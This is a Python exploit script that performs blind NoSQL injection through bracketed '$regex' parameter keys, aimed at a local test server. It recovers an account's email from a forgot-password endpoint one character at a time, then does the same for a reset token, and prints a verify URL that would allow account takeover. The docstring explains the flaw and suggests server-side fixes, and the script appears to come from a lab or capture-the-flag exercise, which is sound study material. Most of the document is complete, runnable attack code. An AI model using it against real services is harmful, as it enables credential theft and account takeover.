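"""Blind, character-by-character extraction through an unsanitised ``$regex`` operator key.

Runs against the local test instance named in ``host``. Both endpoints used
here accept a bracketed parameter name (``email[$regex]``, ``t[$regex]``);
the server's query/body parser turns that into a nested object which, judging
by the responses documented below, reaches the database query unchanged. A
``^prefix`` pattern then acts as a yes/no oracle for one more character of the
stored value. The fix belongs on the server: reject non-string values for
these fields (or strip ``$``-prefixed keys before building the query) and
alert on requests whose parameter names contain ``[$``.
"""
import requests as req
import string

host = "http://localhost:4000"
# Alphabet tried at every position: letters, digits, then '@' and '.' so that
# an email address can be completed.
charset = string.ascii_letters + string.digits + '@.'


def email_valid(prefix):
    """Return True when some account's email starts with ``prefix``.

    The server answers 200 ``{"success":true}`` when the regex matched and
    400 "There is no user with that email." otherwise, so the status code
    alone is the oracle.
    """
    res = req.post(host + '/admin/forgotpassword',
                   data={'email[$regex]': '^' + prefix})
    return res.status_code == 200


def token_valid(prefix):
    """Return True when a stored token starts with ``prefix``.

    On a match the server redirects to ``/admin/sp/[object%20Object]``;
    otherwise it redirects to ``/admin``. Redirects are not followed so the
    ``Location`` header can be inspected directly. ``headers.get`` keeps a
    response that carries no ``Location`` at all from raising KeyError; such
    a response counts as "not found".
    """
    res = req.get(host + '/admin/verify',
                  params={'t[$regex]': '^' + prefix},
                  allow_redirects=False)
    return '/admin/sp/' in res.headers.get('Location', '')


def blind(validator):
    """Grow a string one character at a time, using ``validator`` as the oracle.

    Args:
        validator: callable taking a candidate prefix and returning True when
            it is still a valid prefix of the secret.

    Returns:
        The longest prefix found. The loop stops at the first position where
        no character in ``charset`` is accepted, which also happens when the
        secret contains a character the alphabet does not cover. The current
        result is printed after every round, including the final failed one.
    """
    res = ''
    while True:
        found = False
        for c in charset:
            if validator(res + c):
                res += c
                found = True
                break
        print(res)
        if not found:
            break
    return res


def exploit():
    """Recover the email, then the token, and print the resulting verify URL."""
    print('Start finding email ...')
    email = blind(email_valid)
    print('Start finding token ...')
    token = blind(token_valid)
    print()
    print('Email:', email)
    print('Token:', token)
    print(host + '/admin/verify?t=' + token)


# Guarded so that importing the module (e.g. to test ``blind``) sends no requests.
if __name__ == "__main__":
    exploit()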